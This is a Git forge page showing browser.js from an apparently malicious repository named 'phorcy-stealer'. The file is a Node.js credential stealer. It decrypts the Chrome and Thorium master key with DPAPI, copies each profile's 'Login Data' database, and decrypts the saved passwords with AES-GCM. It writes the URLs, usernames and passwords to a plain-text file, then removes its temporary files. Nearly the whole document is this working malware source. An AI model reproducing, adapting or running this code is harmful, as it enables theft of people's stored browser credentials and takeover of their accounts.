whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b34853e802a1cdd974f7dbfe34aab682f2bdc4f3
phorcy-stealer/Utils/browser.js
gumbobr0t 109f8b4050 Update browser.js
2023-11-18 22:57:09 +01:00

174 lines
8.7 KiB
JavaScript
Raw Blame History

const os = require('os');
const fs = require('fs');
const sqlite3 = require('sqlite3').verbose();
const dpapi = require('./node-dpapi');
const crypto = require('crypto')
const path = require('path')
class BrowserStealing {
constructor() {
this.phorcyDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Phorcy')
this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')]
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5']
this.password_command = 'SELECT action_url, username_value, password_value FROM logins';
//this.cookie_command = 'SELECT * FROM cookies';
this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`;
this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`;
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt')
//this.cookie_count = 0
this.password_count = 0
}
generateRandomString() {
const randomCharacter = () => Math.random().toString(36).substring(2, 3).toUpperCase();
return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`;
}
async getPasswords() {
fs.mkdir(this.tempDirCreated, (error) => {
if (error) {
console.error('Error creating temp directory:', error);
return;
}
console.log('Temp Directory created successfully.');
for (const browserPath of this.browserPaths) {
console.log(browserPath);
const local_state = path.join(browserPath, 'Local State');
console.log(local_state);
fs.readFile(local_state, 'utf8', (err, data) => {
if (err) {
console.error('Error reading local state file:', err);
return;
}
const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser");
console.log('Decryption Key:', decrypted);
for (const profile of this.browserProfiles) {
const password_file = path.join(browserPath, profile, 'Login Data')
console.log(password_file)
const decryption_file = path.join(this.tempDirCreated, this.generateRandomString())
console.log(decryption_file)
fs.copyFile(password_file, decryption_file, (error) => {
if (error) {
console.error('Error copying login data file:', error);
return;
}
console.log('Login data file copied successfully.');
const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error('Error opening login database:', err);
return;
}
db.all(this.password_command, (err, rows) => {
if (err) {
console.error('Error executing login SQLite command:', err);
} else {
const formattedRows = rows.map(row => {
if (row && row['password_value']) {
let password_value = row['password_value'];
let start = password_value.slice(3, 15),
middle = password_value.slice(15, password_value.length - 16),
end = password_value.slice(password_value.length - 16, password_value.length),
decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start);
decipher.setAuthTag(end);
this.password_count++;
try {
const formattedContent = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`;
fs.writeFileSync(this.passwordFile, formattedContent, { flag: 'a' });
console.log(`Password written to file successfully.`);
} catch (err) {
console.error('Error writing password to file:', err);
}
//return {
// action_url: row.action_url ? row.action_url.toString() : '',
// username_value: row.username_value ? row.username_value.toString() : '',
// password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(),
//};
} else {
return {
action_url: '',
username_value: '',
password_value: '',
};
}
});
console.log('Password list:', formattedRows);
console.log('Password count:', this.password_count);
}
db.close((err) => {
if (err) {
console.error('Error closing login database:', err);
}
});
});
});
});
fs.unlink(decryption_file, (error) => {
if (error) {
console.error('Error deleting decryption password file:', error);
} else {
console.log('Decryption password File deleted successfully.');
}
});
}
});
}
});
}
cleanUp() {
fs.rm(this.tempDirCreated, { recursive: true }, (error) => {
if (error) {
console.error('Error deleting temp directory:', error);
} else {
console.log('Temp Directory deleted successfully.');
}
});
fs.rm(this.phorcyDir, { recursive: true }, (error) => {
if (error) {
console.error('Error deleting Phorcy directory:', error);
} else {
console.log('Phorcy Directory deleted successfully.');
}
});
}
async prepare() {
try {
fs.mkdirSync(this.phorcyDir);
console.log('Phorcy Directory created successfully.');
} catch (err) {
console.error('Error creating Phorcy directory:', err.message)
}
}
async Main() {
await this.prepare();
await this.getPasswords();
setTimeout(function() {
console.log("Browser stealing complete. Cleaning.");
this.cleanUp();
}.bind(this), 4000);
}
}
const browserStealer = new BrowserStealing();
browserStealer.Main();
Reference in New Issue View Git Blame Copy Permalink